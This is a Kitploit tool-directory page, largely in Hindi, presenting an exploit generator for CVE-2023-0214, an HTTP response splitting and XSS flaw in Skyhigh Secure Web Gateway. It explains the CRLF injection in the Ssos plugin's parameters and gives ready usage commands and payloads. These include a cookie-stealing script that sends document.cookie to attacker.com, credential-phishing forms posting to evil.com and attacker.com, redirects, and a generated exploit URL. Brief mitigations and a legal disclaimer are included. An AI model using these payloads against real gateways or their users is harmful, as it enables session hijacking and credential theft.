Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-0214 — सुरक्षित वेब गेटवे 10.2.11 - क्रॉस-साइट स्क्रिप्टिंग (XSS) | Kitploit
उपकरण/GitHubGitHub/0pts/cve-2023-0214
फ़िशिंग उपकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHub0pts/cve-2023-0214

CVE-2023-0214

सुरक्षित वेब गेटवे 10.2.11 - क्रॉस-साइट स्क्रिप्टिंग (XSS)

रिपॉजिटरी देखें
247 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

SWG Exploit Generator

root@kitploit:~
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝   ██║   ███████╗
████╔╝██║██╔═══╝    ██║   ╚════██║
╚██████╔╝██║        ██║   ███████║
 ╚═════╝ ╚═╝        ╚═╝   ╚══════╝

by 0PTS

Skyhigh Secure Web Gateway (पूर्व में McAfee Web Gateway) में HTTP Response Splitting भेद्यता के लिए Proof of Concept।

भेद्यता के बारे में

Skyhigh Secure Web Gateway में एक महत्वपूर्ण HTTP Response Splitting भेद्यता, जो मनमाने HTML/JavaScript कोड के इंजेक्शन के माध्यम से दूरस्थ रूप से XSS हमलों को निष्पादित करने की अनुमति देती है।

तकनीकी विवरण

  • प्रकार: HTTP Response Splitting / Cross-Site Scripting (XSS)
  • खतरा: उच्च
  • हमला वेक्टर: दूरस्थ, प्रमाणीकरण की आवश्यकता नहीं

एक्सप्लॉइट का कार्य सिद्धांत

भेद्यता "Ssos" प्लगइन (क्रिया SetLoginToken) में है, जो URL पैरामीटर को गलत तरीके से संसाधित करता है:

  1. पैरामीटर "p" → P3P हेडर में इंजेक्ट किया जाता है
  2. पैरामीटर "c" → प्रतिक्रिया के मुख्य भाग में इंजेक्ट किया जाता है
  3. पैरामीटर "v" → MwgSso कुकी में इंजेक्ट किया जाता है

चूंकि न्यूलाइन वर्ण (\r\n / %0d%0a) एस्केप नहीं किए जाते, हमलावर यह कर सकता है:

  • मनमाने HTTP हेडर इंजेक्ट करना
  • Content-Type और Content-Length को ओवरराइड करना
  • मनमाने HTML/JavaScript कोड इंजेक्ट करना

ब्राउज़र सही ढंग से निर्मित Content-Length के बाद शेष प्रतिक्रिया सामग्री को अनदेखा करता है, जो प्रदर्शित सामग्री को पूरी तरह से बदलने की अनुमति देता है।

उपयोग

बुनियादी प्रारंभ

root@kitploit:~
python explot.py

पैरामीटर के साथ (nmap की तरह)

root@kitploit:~
# Базовый XSS
python explot.py -d example.com -p "<script>alert(document.domain)</script>"

# Редирект
python explot.py -d target.com -p '<meta http-equiv="refresh" content="0;url=https://evil.com/">'

# Фишинг форма
python explot.py -d bank.com -p '<form action="https://evil.com/steal"><input name="pass" placeholder="Password"><button>Login</button></form>'

# Только URL (тихий режим)
python explot.py -d example.com -p "<script>alert(1)</script>" -q

पैरामीटर

root@kitploit:~
-d, --domain    लक्ष्य डोमेन (डिफ़ॉल्ट: google.com)
-x, --prefix    URL पथ उपसर्ग (डिफ़ॉल्ट: SWG internal path)
-p, --payload   HTML/JavaScript payload
-q, --quiet     शांत मोड - केवल URL
-v, --version   स्क्रिप्ट का संस्करण
-h, --help      सहायता

पेलोड उदाहरण

कुकी चुराने वाला XSS

root@kitploit:~
<script>fetch('https://attacker.com/log?c='+document.cookie)</script>

फिशिंग फॉर्म

root@kitploit:~
<html>
<body style="font-family:Arial">
<h2>Session Expired - Please Login Again</h2>
<form action="https://attacker.com/phish" method="POST">
<input type="text" name="user" placeholder="Username"><br>
<input type="password" name="pass" placeholder="Password"><br>
<button>Login</button>
</form>
</body>
</html>

दुर्भावनापूर्ण साइट पर रीडायरेक्ट

root@kitploit:~
<meta http-equiv="refresh" content="0;url=https://malicious-site.com/">

प्रदर्शन

root@kitploit:~
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝   ██║   ███████╗
████╔╝██║██╔═══╝    ██║   ╚════██║
╚██████╔╝██║        ██║   ███████║
 ╚═════╝ ╚═╝        ╚═╝   ╚══════╝

[+] Target Domain:   example.com
[+] Payload Length:  43 bytes
[+] URL Length:      234 chars

[+] Generated URL:

http://example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=1&c=1&p=p%0D%0AContent-Type%3A%20text%2Fhtml%3Bcharset%3Dutf-8%0D%0AContent-Length%3A%2043%0D%0A%0D%0A%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

सुरक्षा

  1. Skyhigh SWG को नवीनतम संस्करण में अपडेट करें
  2. CRLF इंजेक्शन फ़िल्टरिंग के साथ WAF का उपयोग करें
  3. /mwg-internal/* के संदिग्ध अनुरोधों की निगरानी करें

अस्वीकरण

⚠️ चेतावनी: यह उपकरण केवल इसके लिए है:

  • अधिकृत पैठ परीक्षण
  • शैक्षिक उद्देश्यों
  • CTF प्रतियोगिताएं
  • सुरक्षा अनुसंधान

मालिक की स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध उपयोग अवैध है।

स्रोत

  • https://www.exploit-db.com/exploits/51237
  • Skyhigh Security Bulletins

root@kitploit:~
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝   ██║   ███████╗
████╔╝██║██╔═══╝    ██║   ╚════██║
╚██████╔╝██║        ██║   ███████║
 ╚═════╝ ╚═╝        ╚═╝   ╚══════╝
टूल डाउनलोड करें